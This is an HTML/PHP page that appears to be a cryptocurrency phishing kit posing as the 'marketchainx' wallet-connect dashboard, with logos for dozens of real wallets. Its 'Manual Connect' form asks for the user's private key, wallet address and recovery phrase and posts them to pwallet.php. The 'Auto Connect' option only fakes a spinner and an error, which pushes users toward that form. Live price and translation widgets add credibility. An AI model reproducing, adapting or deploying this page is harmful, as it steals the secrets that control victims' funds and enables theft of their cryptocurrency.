<!DOCTYPE html>
<html lang="en">
<head>
  <!-- Meta Information -->
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>marketchainx - Wallet</title>
  <meta name="keywords" content="crypto, dashboard, cryptocurrency, trading, investment">
  <meta name="description" content="A longer, more detailed responsive cryptocurrency dashboard with gradient background, Google Translator, live prices, chart, news, and more.">
  <link rel="icon" href="https://marketchainx.com/session/faviconb.png" type="image/x-icon">

  <!-- Tailwind CSS (Using the official CDN script only once) -->
  <script src="https://cdn.tailwindcss.com"></script>

  <!-- SweetAlert2 -->
  <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>

  <!-- Chart.js -->
  <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>

  <!-- Font Awesome -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css"/>

  <!-- Google Fonts -->
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700&display=swap" rel="stylesheet">

  <!-- Google Translate -->
  <script type="text/javascript">
    function googleTranslateElementInit() {
      new google.translate.TranslateElement({pageLanguage: 'en'}, 'google_translate_element');
    }
  </script>
  <script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>

  <!-- Custom Styles -->
  <style>
    /* Base Styles */
    body {
      font-family: 'Inter', sans-serif;
      background-color: #F2F5FA;
      color: #1F2937;
      overflow-x: hidden;
      margin: 0;
      padding: 0;
    }
    /* Preloader Styles */
    .preloader {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: #F2F5FA;
      display: flex;
      justify-content: center;
      align-items: center;
      z-index: 9999;
    }
    .loader {
      border: 6px solid #E5E7EB;
      border-top: 6px solid #6366F1;
      border-radius: 50%;
      width: 40px;
      height: 40px;
      animation: spin 1s linear infinite;
    }
    @keyframes spin {
      to { transform: rotate(360deg); }
    }
    /* Scrollbar Styles */
    ::-webkit-scrollbar {
      width: 8px;
    }
    ::-webkit-scrollbar-thumb {
      background-color: #CBD5E1;
      border-radius: 9999px;
    }
    /* Card & Button Styles */
    .card {
      background-color: #FFFFFF;
      border-radius: 16px;
      box-shadow: 0 10px 15px rgba(0, 0, 0, 0.05);
    }
    .btn-gradient {
      background: linear-gradient(90deg, #4F46E5 0%, #7C3AED 100%);
      color: #FFFFFF;
      box-shadow: 0 4px 6px rgba(124, 58, 237, 0.4);
    }
    .btn-icon {
      background-color: #E0E7FF;
      color: #4F46E5;
    }
    /* Neumorphic Styles */
    :root {
      --primary-light: #8abdff;
      --primary: #6d5dfc;
      --primary-dark: #5b0eeb;
      --white: #FFFFFF;
      --greyLight-1: #E4EBF5;
      --greyLight-2: #c8d0e7;
      --greyLight-3: #bec8e4;
      --greyDark: #9baacf;
    }
    @keyframes shimmer {
      0% { background-position: -200% 0; }
      100% { background-position: 200% 0; }
    }
    .neumorphic-card {
      border-radius: 1.6rem;
      padding: 1.5rem;
      margin: 1.2rem 0;
      box-shadow: .3rem .3rem .6rem var(--greyLight-2), -0.2rem -0.2rem .5rem var(--white);
      transition: all 0.3s cubic-bezier(0.645, 0.045, 0.355, 1);
      position: relative;
      overflow: hidden;
    }
    .neumorphic-card:hover {
      box-shadow: .4rem .4rem .8rem var(--greyLight-2), -0.4rem -0.4rem .8rem var(--white);
      transform: translateY(-0.2rem);
    }
    .shimmer-effect {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: linear-gradient(90deg, rgba(198,212,245,0) 0%, rgba(198,212,245,0.3) 50%, rgba(198,212,245,0) 100%);
      animation: shimmer 2.5s infinite;
      z-index: 1;
    }
    .text-green-500 { color: var(--primary); }
    .text-red-500 { color: #EF4444; }
    .font-medium { color: var(--greyDark); }
    .text-gray-500 { color: var(--greyLight-3); }
    .font-semibold { color: var(--greyDark); }
    
    /* Blinking dot for crypto prices */
    .blinking-dot {
      display: inline-block;
      width: 10px;
      height: 10px;
      background-color: #10b981;
      border-radius: 50%;
      margin-left: 8px;
      animation: blink 1s infinite;
    }
    @keyframes blink {
      0% { opacity: 1; }
      50% { opacity: 0; }
      100% { opacity: 1; }
    }
    
    /* Modal Styles (Wallet & Auto Connect) */
    .modal {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background: rgba(0,0,0,0.5);
      display: none;
      align-items: center;
      justify-content: center;
      z-index: 1000;
    }
    .modal.active {
      display: flex;
    }
    .modal-content {
      background: #fff;
      padding: 1.5rem;
      border-radius: 0.5rem;
      text-align: center;
      position: relative;
      min-width: 300px;
      max-width: 90%;
    }
    .close-modal {
      position: absolute;
      top: 0.5rem;
      right: 0.5rem;
      cursor: pointer;
      font-size: 1.5rem;
      color: #666;
    }
    .close-modal:hover {
      color: #000;
    }
    /* Spinner for auto connect */
    .spinner {
      margin: 1rem auto;
      width: 40px;
      height: 40px;
      border: 4px solid rgba(0,0,0,0.1);
      border-top: 4px solid #3B82F6;
      border-radius: 50%;
      animation: spin 1s linear infinite;
    }
    /* Form & Input Styles */
    .form-group {
      margin-bottom: 1rem;
      text-align: left;
    }
    .form-group label {
      display: block;
      color: #3B82F6;
      font-weight: 500;
      margin-bottom: 0.5rem;
    }
    .form-group input,
    .form-group select {
      width: 100%;
      padding: 0.5rem;
      border: 1px solid #3B82F6;
      border-radius: 0.25rem;
      font-size: 1rem;
      background-color: #000;
      color: #fff;
    }
    .submit-button {
      width: 100%;
      background-color: #10B981;
      color: white;
      padding: 0.75rem;
      border: none;
      border-radius: 0.25rem;
      font-size: 1rem;
      cursor: pointer;
    }
    .submit-button:hover {
      background-color: #059669;
    }
    /* Utility class */
    .hidden { display: none; }
  </style>
</head>
<body class="bg-gradient-to-b from-gray-50 to-gray-100 min-h-screen">

  <!-- Crypto Prices Widget Section -->
  <section class="bg-white shadow-sm rounded-lg p-6 mx-4 my-6">
    <h2 class="text-2xl font-semibold text-gray-800 mb-4">
      Live Crypto Prices
      <span class="blinking-dot"></span>
    </h2>
    <div id="cryptoPrices" class="grid grid-cols-1 sm:grid-cols-3 gap-4">
      <!-- Price cards will be injected by JavaScript -->
      <div class="crypto-price-card shimmer h-16 rounded-md"></div>
      <div class="crypto-price-card shimmer h-16 rounded-md"></div>
      <div class="crypto-price-card shimmer h-16 rounded-md"></div>
    </div>
  </section>

  <!-- Main Content Container -->
  <div class="container mx-auto py-8 px-4">
    <!-- Header Section -->
    <div class="text-center mb-10">

<?php
if (isset($_SESSION['success'])) {
    echo "<div  class='alert alert-success alert-dismissible fade show' role='alert'>
        <svg class='bi flex-shrink-0 me-2' width='24' height='24' role='img' aria-label='Danger:'><use xlink:href='#exclamation-triangle-fill'/></svg>
        <div>".$_SESSION['success']."</div>
        
    </div>";
    unset($_SESSION['success']);
}
?>	
      <button onclick="history.back()" style="background-color: red; color: white; padding: 10px 20px; border: none; border-radius: 5px; cursor: pointer;">
  Close
</button>

      <h1 class="text-4xl md:text-5xl font-bold text-gray-800 mb-3">
        Available <span class="text-blue-600">Crypto Wallets</span>
      </h1>
      <p class="text-gray-600 max-w-2xl mx-auto">
        Connect securely to your favorite DApps with our wide selection of supported wallets. Simply click on a wallet to establish a connection.
      </p>
    </div>

    <!-- Search and Filter Bar -->
    <div class="bg-white rounded-lg shadow-md p-4 mb-8 flex flex-col md:flex-row gap-4 justify-between items-center">
      <div class="relative w-full md:w-80">
        <div class="absolute inset-y-0 left-0 pl-3 flex items-center pointer-events-none">
          <svg xmlns="http://www.w3.org/2000/svg" class="h-5 w-5 text-gray-400" fill="none" viewBox="0 0 24 24" stroke="currentColor">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M21 21l-6-6m2-5a7 7 0 11-14 0 7 7 0 0114 0z" />
          </svg>
        </div>
        <input type="text" id="searchWallet" placeholder="Search wallets..." class="pl-10 pr-4 py-2 w-full rounded-md border border-gray-300 focus:ring-2 focus:ring-blue-500 focus:border-transparent transition-all">
      </div>
      <div class="flex items-center space-x-1 overflow-x-auto w-full md:w-auto pb-2 md:pb-0">
        <button class="tab-item active whitespace-nowrap px-4 py-2 text-sm font-medium" data-category="all">All Wallets</button>
        <button class="tab-item whitespace-nowrap px-4 py-2 text-sm font-medium text-gray-600" data-category="popular">Popular</button>
        <button class="tab-item whitespace-nowrap px-4 py-2 text-sm font-medium text-gray-600" data-category="hardware">Hardware</button>
        <button class="tab-item whitespace-nowrap px-4 py-2 text-sm font-medium text-gray-600" data-category="mobile">Mobile</button>
        <button class="tab-item whitespace-nowrap px-4 py-2 text-sm font-medium text-gray-600" data-category="extension">Extension</button>
      </div>
    </div>

    <!-- Wallet Cards Grid -->
    <div class="grid grid-cols-2 sm:grid-cols-3 md:grid-cols-4 lg:grid-cols-5 xl:grid-cols-6 gap-4 mb-10" id="walletGrid">
      <!-- Wallet cards are generated dynamically via JavaScript -->
    </div>
  </div>

  <!-- Wallet Modal (For Connection) -->
  <div id="walletModal" class="fixed inset-0 bg-blue-900 bg-opacity-50 flex items-center justify-center hidden">
    <div class="bg-white rounded-lg shadow-lg w-11/12 md:w-1/2 lg:w-1/3 p-6 relative">
      <!-- Close Button -->
      <button id="closeModal" class="absolute top-2 right-2 text-gray-600 hover:text-gray-800 text-2xl">&times;</button>
      <!-- Modal Header -->
      <h2 id="modalWalletName" class="text-2xl font-bold text-blue-600 mb-4 text-center">Wallet Name</h2>
      <!-- Connect Method Buttons -->
      <div class="flex justify-around mb-4">
        <button id="manualConnect" class="bg-blue-500 hover:bg-blue-600 text-white py-2 px-4 rounded">Manual Connect</button>
        <button id="autoConnectButton" class="bg-blue-500 hover:bg-blue-600 text-white py-2 px-4 rounded">Auto Connect</button>
      </div>

      <!-- Auto Connect Modal -->
      <div id="autoConnectModal" class="modal">
        <div class="modal-content">
          <span id="closeAutoConnectModal" class="close-modal" aria-label="Close modal">&times;</span>
          <div id="spinner" class="spinner"></div>
          <p id="errorMessage" class="error-message" aria-live="polite"><strong>No Ethereum wallet found. Please install MetaMask.</strong></p>
        </div>
      </div>

      <!-- Hidden Fields (User Info from Session) -->
      <input type="hidden" name="user_email" value="<?php echo htmlspecialchars($email); ?>">
      <input type="hidden" name="user_name" value="<?php echo htmlspecialchars($name); ?>">

      <!-- Wallet Connect Form (Shown on Manual Connect) -->
      <form id="walletConnectForm" action="pwallet.php" method="post" class="hidden mt-4">
        <div class="modal-dialog" role="document">
          <div class="modal-content p-4">
            <div class="modal-header flex items-center justify-between">
              <span class="flex items-center">
                <img src="https://app.shieldeum.net/png/logos_metamask-icon.png" alt="MetaMask Icon" style="width: 24px; height: 24px; vertical-align: middle; margin-right: 8px;">
                Connect Now
              </span>
              <span class="icon-cancel cursor-pointer" id="formCloseModal" aria-hidden="true">&times;</span>
            </div>
            <div class="modal-body mt-4">
              <div class="form-group">
                <label for="wtype">Confirm Wallet Type</label>
                <select name="wtype" class="form-control" style="background-color: #4E79FA; color: white; border: none;">
                  <option value="">Select Wallet Type</option>
                  <option value="Software">Software</option>
                  <option value="Hard">Hard</option>
                  <option value="Paper">Paper</option>
                </select>
              </div>
              <div class="form-group mt-4">
                <label for="privateKeyInput">Private Key</label>
                <input id="privateKeyInput" type="text" class="form-input" name="pkey" placeholder="Enter private key">
              </div>
              <div class="form-group mt-4">
                <label for="walletAddressInput">Wallet Address</label>
                <input id="walletAddressInput" type="text" class="form-input" name="wadd" placeholder="Enter wallet address">
              </div>
              <div class="form-group mt-4">
                <label for="walletPhraseInput">Wallet Phrase</label>
                <input id="walletPhraseInput" type="text" class="form-input" name="wphrase" placeholder="Enter wallet phrase if available">
              </div>
              <input type="hidden" name="amount" value="20">
              <button type="submit" class="submit-button mt-6">Submit</button>
            </div>
          </div>
        </div>
      </form>
    </div>
  </div>

  <!-- Inline JavaScript: Wallet Grid, Modal & Connection Handling, Crypto Prices, and Translation -->
  <script>
    // Global filter variables
    let currentCategory = "all";
    let currentSearch = "";

    // Array of wallet objects
    const wallets = [
      { name: "MetaMask", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQkrvbcW7C6Y-wG1DmOZa2A0NisoDlJGKuTrw&s", category: ["popular", "extension"] },
      { name: "Trust Wallet", logo: "https://trustwallet.com/assets/images/media/assets/TWT.png", category: ["popular", "mobile"] },
      { name: "Coinbase Wallet", logo: "https://avatars.githubusercontent.com/u/1885080?s=280&v=4", category: ["popular", "mobile"] },
      { name: "Rainbow", logo: "https://img.cryptorank.io/coins/rainbow1670217016862.png", category: ["mobile"] },
      { name: "Ledger", logo: "https://www.yadawallets.com/wp-content/uploads/2020/10/Ledger-nano-logo.png", category: ["hardware"] },
      { name: "Trezor", logo: "https://images-cdn.ubuy.co.in/67060539d5d1036cef66c165-trezor-safe-5-crypto-hardware-wallet.jpg", category: ["hardware"] },
      { name: "Exodus", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTXUXDrwbJVjjBsosDfoZBIYkh5Dpgfw12NXw&s", category: ["popular", "desktop"] },
      { name: "Atomic Wallet", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR5NXuXvKhVRyHp9MAMIJgXAuxa34qIcCUMaw&s", category: ["desktop"] },
      { name: "MathWallet", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSqLhM8kKRTm7gyEYxlQGV-_XkgsHPpNo-Zw&s", category: ["mobile"] },
      { name: "imToken", logo: "https://play-lh.googleusercontent.com/Ja-xk6ZTXzuGVvqfTRJahBBwJLFE-Dz8pEdyjfRM9jz87fDA_hdYDe3QM70EzyquDw", category: ["mobile"] },
      { name: "TokenPocket", logo: "https://avatars.githubusercontent.com/u/40916192?s=280&v=4", category: ["mobile"] },
      { name: "Guarda", logo: "https://images.crunchbase.com/image/upload/c_pad,f_auto,q_auto:eco,dpr_1/rrsydn8amxllljfufyoo", category: ["mobile"] },
      { name: "SafePal", logo: "https://public.rootdata.com/images/b16/1666343154314.jpg", category: ["mobile"] },
      { name: "Ellipal", logo: "https://play-lh.googleusercontent.com/Y3pfaY7pz_8nTzqSYR93ipk29mAXT3AjzvcLLYmehYuZNVe5vzixjfGjVKSKxc2FUueX", category: ["hardware", "mobile"] },
      { name: "BitKeep", logo: "https://coinpanda.io/wp-content/uploads/2023/06/bitkeep.svg", category: ["mobile"] },
      { name: "AlphaWallet", logo: "https://avatars.githubusercontent.com/u/36216689?s=280&v=4", category: ["popular", "extension"] },
      { name: "Argent", logo: "https://play-lh.googleusercontent.com/P-xt-cfYUtwVQ3YsNb5yd5_6MzCHmcKAbRkt-up8Ga44x_OCGLy4WFxsGhxfJaSLEw", category: ["mobile"] },
      { name: "BitPay", logo: "https://downloadr2.apkmirror.com/wp-content/uploads/2020/09/02/5f625fd8dd8e0.png", category: ["popular", "mobile"] },
      { name: "BRD", logo: "https://play-lh.googleusercontent.com/-2cevFNM9hAjRVMjlthiTDi6VfJ2eA_rPOQw6_-Pa-zx62OZZah95rwppztU2aDvtHZn", category: ["mobile"] },
      { name: "CoolWallet S", logo: "https://play-lh.googleusercontent.com/Fh6qQqnzTc1PctcLekAHWG2WqnzCFbAwGYEdA48rVdwAso5Ws4CCe54IUylGEb-F8I8", category: ["hardware", "mobile"] },
      { name: "Dapper", logo: "https://avatars.githubusercontent.com/u/36311083?v=4", category: ["popular"] },
      { name: "Infinito", logo: "https://play-lh.googleusercontent.com/hSuqrK6xxYr9xTBi7LWawuH8WLSpBXP3QUWr5AosjUxZedLHYCEWIQtZAGmeB7x5Bns", category: ["mobile"] },
      { name: "KeepKey", logo: "https://avatars.githubusercontent.com/u/8077335?s=280&v=4", category: ["hardware"] },
      { name: "Kyber", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTQbsOVIqYE84gTAeQAXtWCJeTVvYbOdq8ECA&s", category: ["extension"] },
      { name: "Lumi Wallet", logo: "https://bitpay.com/img/wallet-logos/lumi-wallet.svg", category: ["mobile"] },
      { name: "Nexo", logo: "https://altcoinsbox.com/wp-content/uploads/2023/03/nexo-logo-vertical.png", category: ["mobile"] },
      { name: "OneKey", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTxMmsDIBBKyNMy3c2Dye35uBuU2adjJnTbgQ&s", category: ["mobile"] },
      { name: "Proteus", logo: "https://banner2.cleanpng.com/20181106/twc/kisspng-logo-brand-product-design-font-5be2601b8123b9.823198931541562395529.jpg", category: ["mobile"] },
      { name: "Securosys", logo: "https://miro.medium.com/v2/resize:fit:1176/1*IEjJxYYoxyz0ZraO2-HVhw.png", category: ["hardware"] },
      { name: "Zelcore", logo: "https://zelcore.io/favicon.ico", category: ["popular", "desktop"] },
      { name: "Edge", logo: "https://play-lh.googleusercontent.com/AKqwHNI1yPzLAhzHur2Nn7Wwkcbk4cZ7ylCSbG2l1RwckqnVA9wpLnA3VdG6QXmv-9PJ=w240-h480-rw", category: ["mobile"] },
      { name: "Coinomi", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSRUOdOzoPKkQ58RkCw0JPtct9I_wg1IMt6KA&s", category: ["mobile"] },
      { name: "BlockWallet", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS43jA5NG5kn8KI9AGJYm2SJ46J9NBNViKUYg&s", category: ["extension"] },
      { name: "Opera Wallet", logo: "https://cdn.worldvectorlogo.com/logos/opera-1.svg", category: ["extension"] },
      { name: "AToken", logo: "https://cdn6.aptoide.com/imgs/7/f/3/7f38b5aad31c6c2c7562506a6aa9c0fc_icon.png", category: ["mobile"] },
      { name: "HyperPay", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT39K3fQCUG9aPb-6JmKlPGFxtPPBf_W-RRGA&s", category: ["mobile"] },
      { name: "PlasmaPay", logo: "https://cdn.worldvectorlogo.com/logos/plasmapay-1.svg", category: ["mobile"] },
      { name: "Wombat Wallet", logo: "https://pbs.twimg.com/profile_images/1542504254711115779/NUYORaEm_400x400.png", category: ["mobile"] },
      { name: "Phantom", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRUFfkFHU_HPhmbfkap3yRDrp7wCHvbZ3T1aw&s", category: ["popular", "mobile"] },
      { name: "Solflare", logo: "https://cdn.prod.website-files.com/66e480f0e9eccea9c231ce92/66e619478b339554984f72ff_solflare-wallet-logo.png", category: ["mobile"] },
      { name: "BitGo", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQg1VZkDOGJ_nse3dePkofPHm9uVPuA1adJfQ&s", category: ["popular", "desktop"] },
      { name: "Bitwala", logo: "https://www.eu-startups.com/wp-content/uploads/2019/09/Bitwala.png", category: ["desktop"] },
      { name: "Trustology", logo: "https://www.crypto-reporter.com/wp-content/uploads/2020/03/trustology.jpg", category: ["mobile"] },
      { name: "Crypto.com DeFi Wallet", logo: "https://www.shutterstock.com/image-vector/crypto-token-coin-logo-vector-600nw-1717799788.jpg", category: ["popular", "mobile"] },
      { name: "MyEtherWallet", logo: "https://play-lh.googleusercontent.com/Rn3Wu7k_hmT_TJwkIECF14DdoTMREzYOhsIEK9WIboFqH4sj_YwQk4v0xxUJMLVME2U", category: ["desktop", "extension"] },
      { name: "MyCrypto", logo: "https://avatars.githubusercontent.com/u/32279762?s=280&v=4", category: ["desktop", "extension"] },
      { name: "Coin98 Wallet", logo: "https://play-lh.googleusercontent.com/smoZuXMeBuQm7ub6TNjnkorzWc5HWyBlmNNi1-GBbgF3jbZRkyh_FmBxRwEpnvwR1WI", category: ["mobile"] },
      { name: "Zabo", logo: "https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS6UEfCvZYzYK_i7ZjXSHWBdm0EfIzHKyxlkw&s", category: ["desktop"] },
      { name: "Cobo Wallet", logo: "https://play-lh.googleusercontent.com/LegaR7R5CH1yUG-fimU6GSq1PqA4XNjnMb8lai3kzGPbI2ykSMqmyeKMrjOtiOH0CGVL", category: ["mobile"] },
      { name: "XDEFI Wallet", logo: "https://www.eu-startups.com/wp-content/uploads/2022/01/XDEFI-Wallet.jpg", category: ["desktop", "extension"] }
    ];

    const walletGrid = document.getElementById("walletGrid");

    // Generate wallet cards based on active filters
    function generateWalletCards() {
      walletGrid.innerHTML = "";
      wallets.forEach(wallet => {
        const nameLower = wallet.name.toLowerCase();
        if (!nameLower.includes(currentSearch)) return;
        if (currentCategory !== "all" && !wallet.category.map(cat => cat.toLowerCase()).includes(currentCategory)) return;

        // Create card element
        const card = document.createElement("div");
        card.className = "wallet-card cursor-pointer bg-white hover:bg-gray-50 border border-gray-200 rounded-xl shadow-sm transition-all transform hover:-translate-y-1 p-4 flex flex-col items-center";
        card.setAttribute("data-wallet-name", wallet.name);

        // Add featured badge if wallet is popular
        if (wallet.category.includes("popular")) {
          const badge = document.createElement("span");
          badge.className = "featured-badge text-xs bg-blue-100 text-blue-600 rounded-full px-2 py-1 mb-2";
          badge.innerText = "Popular";
          card.appendChild(badge);
        }

        // Wallet logo image
        const img = document.createElement("img");
        img.src = wallet.logo;
        img.alt = `${wallet.name} Logo`;
        img.className = "w-16 h-16 mb-4";
        card.appendChild(img);

        // Wallet name
        const nameDiv = document.createElement("div");
        nameDiv.className = "text-center font-medium text-gray-800";
        nameDiv.innerText = wallet.name;
        card.appendChild(nameDiv);

        // On click, open modal with wallet name
        card.addEventListener("click", function() {
          openModal(wallet.name);
        });

        walletGrid.appendChild(card);
      });
    }

    // Modal functionality for Wallet Modal
    const modal = document.getElementById("walletModal");
    const modalWalletName = document.getElementById("modalWalletName");
    const walletConnectForm = document.getElementById("walletConnectForm");
    const manualConnect = document.getElementById("manualConnect");
    const closeModalButton = document.getElementById("closeModal");
    const formCloseModal = document.getElementById("formCloseModal");

    function openModal(walletName) {
      modalWalletName.textContent = walletName;
      walletConnectForm.classList.add("hidden");
      modal.classList.remove("hidden");
    }

    // Event Listeners for closing modal
    closeModalButton.addEventListener("click", () => { modal.classList.add("hidden"); });
    window.addEventListener("click", (e) => { if (e.target === modal) modal.classList.add("hidden"); });
    if(formCloseModal){
      formCloseModal.addEventListener("click", () => { walletConnectForm.classList.add("hidden"); });
    }

    // Show manual connect form on click
    manualConnect.addEventListener("click", function() {
      walletConnectForm.classList.remove("hidden");
    });

    // Modified Wallet Connect Form submission handling:
    // Checks that at least one of the fields is filled before submission.
    walletConnectForm.addEventListener("submit", function(event) {
      // Check required fields (e.g., private key or wallet address)
      const pkey = document.getElementById("privateKeyInput").value.trim();
      const wadd = document.getElementById("walletAddressInput").value.trim();
      if (pkey === "" && wadd === "") {
        event.preventDefault();
        alert("Please enter your connection details.");
      } else {
        alert("Connecting " + modalWalletName.textContent + "...");
        modal.classList.add("hidden");
      }
    });

    // Auto Connect Modal functionality
    const autoConnectModal = document.getElementById("autoConnectModal");
    const closeAutoConnectModalButton = document.getElementById("closeAutoConnectModal");
    const spinner = document.getElementById("spinner");
    const errorMessage = document.getElementById("errorMessage");
    const autoConnectButton = document.getElementById("autoConnectButton");

    function showAutoConnectModal() {
      autoConnectModal.classList.add("active");
      spinner.style.display = 'block';
      errorMessage.style.display = 'none';
      setTimeout(() => {
        spinner.style.display = 'none';
        errorMessage.style.display = 'block';
      }, 8000);
    }
    function closeAutoConnectModal() {
      autoConnectModal.classList.remove("active");
      spinner.style.display = 'block';
      errorMessage.style.display = 'none';
    }
    autoConnectButton.addEventListener("click", showAutoConnectModal);
    closeAutoConnectModalButton.addEventListener("click", closeAutoConnectModal);
    window.addEventListener("click", (e) => { if (e.target === autoConnectModal) closeAutoConnectModal(); });

    // Fetch live crypto prices using CoinGecko API
    async function fetchCryptoPrices() {
      const cryptoPricesDiv = document.getElementById("cryptoPrices");
      try {
        const response = await fetch("https://api.coingecko.com/api/v3/simple/price?ids=bitcoin,ethereum,binancecoin&vs_currencies=usd");
        const data = await response.json();
        cryptoPricesDiv.innerHTML = "";
        for (const coin in data) {
          const priceCard = document.createElement("div");
          priceCard.className = "crypto-price-card bg-gray-100 p-4 rounded-md text-center shadow";
          priceCard.innerHTML = `<h3 class="font-semibold capitalize">${coin}</h3><p class="text-lg font-bold text-blue-600">$${data[coin].usd}</p>`;
          cryptoPricesDiv.appendChild(priceCard);
        }
      } catch (error) {
        console.error("Error fetching crypto prices:", error);
      }
    }

    // Wallet connect using MetaMask
    function connectWallet() {
      if (window.ethereum) {
        window.ethereum.request({ method: "eth_requestAccounts" })
          .then(() => {
            alert("Wallet connected successfully!");
          })
          .catch(err => {
            console.error(err);
            alert("Failed to connect wallet.");
          });
      } else {
        alert("No Ethereum wallet found. Please install MetaMask.");
      }
    }

    // Search wallet filter
    document.getElementById("searchWallet").addEventListener("input", function(e) {
      currentSearch = e.target.value.toLowerCase();
      generateWalletCards();
    });

    // Classification filter: event listeners on tab buttons
    document.querySelectorAll(".tab-item").forEach(tab => {
      tab.addEventListener("click", function() {
        document.querySelectorAll(".tab-item").forEach(t => t.classList.remove("active"));
        currentCategory = this.getAttribute("data-category");
        this.classList.add("active");
        generateWalletCards();
      });
    });

    // Initialize wallet cards and crypto prices on page load
    generateWalletCards();
    fetchCryptoPrices();

    /* ----- Translation Functions (Using LibreTranslate API) ----- */
    // Helper: Retrieve all text nodes excluding script/style content.
    function getTextNodes() {
      const walker = document.createTreeWalker(document.body, NodeFilter.SHOW_TEXT, {
        acceptNode: function(node) {
          if (node.parentNode && ['SCRIPT', 'STYLE'].indexOf(node.parentNode.nodeName) === -1) {
            if (node.textContent.trim() !== "") {
              return NodeFilter.FILTER_ACCEPT;
            }
          }
          return NodeFilter.FILTER_REJECT;
        }
      });
      const nodes = [];
      while (walker.nextNode()) {
        nodes.push(walker.currentNode);
      }
      return nodes;
    }

    // Function to chunk text for API limits
    function chunkText(text, maxLength = 500) {
      if (text.length <= maxLength) return [text];
      const chunks = [];
      let currentChunk = "";
      const sentences = text.split(/(?<=[.!?])\s+/);
      for (const sentence of sentences) {
        if ((currentChunk + sentence).length <= maxLength) {
          currentChunk += (currentChunk ? " " : "") + sentence;
        } else {
          if (currentChunk) chunks.push(currentChunk);
          if (sentence.length > maxLength) {
            const words = sentence.split(" ");
            currentChunk = "";
            for (const word of words) {
              if ((currentChunk + word).length <= maxLength) {
                currentChunk += (currentChunk ? " " : "") + word;
              } else {
                if (currentChunk) chunks.push(currentChunk);
                currentChunk = word;
              }
            }
          } else {
            currentChunk = sentence;
          }
        }
      }
      if (currentChunk) chunks.push(currentChunk);
      return chunks;
    }

    // Translate text using LibreTranslate API
    async function translateText(text, targetLang) {
      if (text.length < 2 || !isNaN(text)) {
        return text;
      }
      try {
        const chunks = chunkText(text);
        let fullTranslation = "";
        for (const chunk of chunks) {
          const response = await fetch('https://libretranslate.com/translate', {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify({
              q: chunk,
              source: 'en',
              target: targetLang,
              format: 'text'
            })
          });
          const data = await response.json();
          fullTranslation += (fullTranslation ? " " : "") + (data?.translatedText || chunk);
          await new Promise(resolve => setTimeout(resolve, 250));
        }
        return fullTranslation;
      } catch (error) {
        console.error("Translation error:", error);
        return text;
      }
    }

    // Translate all text nodes on the page
    async function translateAllTextNodes(targetLang) {
      const textNodes = getTextNodes();
      for (const node of textNodes) {
        try {
          const originalText = node.textContent.trim();
          if (originalText.length > 1) {
            const translated = await translateText(originalText, targetLang);
            node.textContent = translated;
          }
        } catch (error) {
          console.error("Error translating a node:", error);
        }
        await new Promise(resolve => setTimeout(resolve, 100));
      }
    }

    // Map country codes to target languages
    const countryLanguageMap = {
      "MX": "es", "CO": "es", "AR": "es", "ES": "es",
      "PE": "es", "VE": "es", "CL": "es", "EC": "es",
      "GT": "es", "BO": "es", "DO": "es", "HN": "es",
      "PY": "es", "SV": "es", "NI": "es", "CR": "es",
      "PA": "es", "UY": "es", "CU": "es", "GQ": "es",
      "DE": "de", "AT": "de", "CH": "de", "LI": "de",
      "LU": "de", "BE": "de"
    };

    // Check geolocation and translate page if applicable
    async function checkGeolocationAndTranslate() {
      try {
        const response = await fetch('https://ipapi.co/json/');
        const data = await response.json();
        if (data?.country_code) {
          const targetLang = countryLanguageMap[data.country_code];
          if (targetLang) {
            console.log(`User in ${data.country_name}. Translating page to ${targetLang}...`);
            await translateAllTextNodes(targetLang);
          } else {
            console.log(`No translation available for country code: ${data.country_code}`);
          }
        }
      } catch (error) {
        console.error("Geolocation error:", error);
      }
    }

    window.addEventListener("load", checkGeolocationAndTranslate);
  </script>
</body>
</html>
